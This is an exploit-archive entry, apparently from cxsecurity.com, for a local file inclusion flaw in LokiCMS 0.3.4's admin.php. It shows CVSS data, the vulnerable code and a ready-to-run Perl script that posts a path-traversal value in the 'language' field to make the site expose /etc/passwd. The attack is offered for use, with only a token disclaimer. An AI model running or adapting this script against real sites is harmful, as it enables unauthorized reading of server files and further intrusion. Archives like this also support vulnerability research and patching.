LokiCMS 0.3.4 (admin.php) Create Local File Inclusion Exploit

2008-10-22 / 2008-10-23
Credit: JosS
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# LokiCMS 0.3.4 (admin.php) Create Local File Inclusion Exploit # url: http://www.lokicms.com/ # # Author: JosS # mail: sys-project[at]hotmail[dot]com # site: http://spanish-hackers.com # team: Spanish Hackers Team - [SHT] # # This was written for educational purpose. Use it at your own risk. # Author will be not responsible for any damage. # # Greetz To: All Hackers and milw0rm website # # *Requirements: magic_quotes_gpc = Off ----------------------------------------------------------- I created the exploit that creates LFI. ----------------------------------------------------------- vuln file: admin.php vuln code: case 'A_SAVE_G_SETTINGS': //save main settings writeconfig ( $c_password, $_POST['title'], $_POST['header'], $_POST['tagline'], $_POST ['footnote'], $c_default, $_POST['theme'], $_POST['language'], $_POST['modrewrite'], $_POST['simplelink'], $_POST ['code'] ); $c_theme = $_POST['theme']; include PATH . '/includes/Config.php'; include PATH . '/languages/' . $c_lang . '.lang.php'; --------> FUCKING THIS INCLUDE!!!! $msg = $lang ['admin'] ['expressionSettingsSaved']; break; -------- Exploit: -------- use LWP::UserAgent; unless ($ARGV[0] && $ARGV[1]) { print "\n[x] LokiCMS 0.3.4 (admin.php) Create Local File Inclusion Exploit\n"; print "[x] written by JosS - sys-project[at]hotmail.com\n"; print "[x] usage: perl $0 [host] [path]\n"; print "[x] example: perl $0 localhost /lokicms/ \n\n"; exit(1); } my $lwp = new LWP::UserAgent or die; my $target = $ARGV[0] =~ /^http:\/\// ? $ARGV[0]: 'http://' . $ARGV[0]; $target .= $ARGV[1] unless not defined $ARGV[1]; $target .= '/' unless $target =~ /^http:\/\/(.?)\/$/; my $res = $lwp->post($target.'admin.php', [ 'LokiACTION' => 'A_SAVE_G_SETTINGS', 'language' => '../../../../../../../../../../etc/passwd%00']); if($res->is_error) { print "[-] Exploit failed!\n"; exit (); } -------- ENTERS ADMIN.PHP TO SEE /ETC/PASSWD Ingenious work :D

References:

http://www.securityfocus.com/bid/31743
http://xforce.iss.net/xforce/xfdb/45843
http://www.milw0rm.com/exploits/6744


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top